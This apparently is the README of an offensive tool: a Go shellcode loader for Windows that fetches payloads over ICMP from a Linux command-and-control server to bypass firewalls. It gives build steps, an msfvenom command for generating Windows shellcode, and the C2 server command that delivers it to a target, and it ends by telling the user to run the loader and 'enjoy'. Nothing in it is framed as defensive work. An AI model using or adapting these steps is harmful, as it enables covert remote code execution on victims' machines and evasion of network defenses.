A Golang shellcode loader that receives payloads via ICMP packets to bypass firewalls. The shellcode loader is currently developed for Windows and the C2 software for Linux systems.
- Windows OS (as your target machine and for compiling the shellcode loader)
- Linux OS (as your local attacking machine and for compiling the C2 program or download the pre-compiled icmp-c2-server)
- GoLand IDE (or any other IDE or code editor with go extension you like)
- Metasploit (to generate shellcodes)
- VPS (only for C&C over internet)
- insert the IP of your VPS in the icmp-sc-loader
- build icmp-sc-loader on/for Windows
- build icmp-c2-server static on/for Linux (build with
CGO_ENABLED=0and-ldflags '-extldflags "-static"') or download the pre-compiled icmp-c2-server
-
generate custom shellcode with msfvenom (it is important that the exit function is set to thread) e.g.
msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f hex -
start the C2 software as root on your Linux system or your Linux VPS e.g. with
./icmp-c2-server -a 64 -os win -sc <your shellcode> -
start the shellcode loader on your Windows system and enjoy
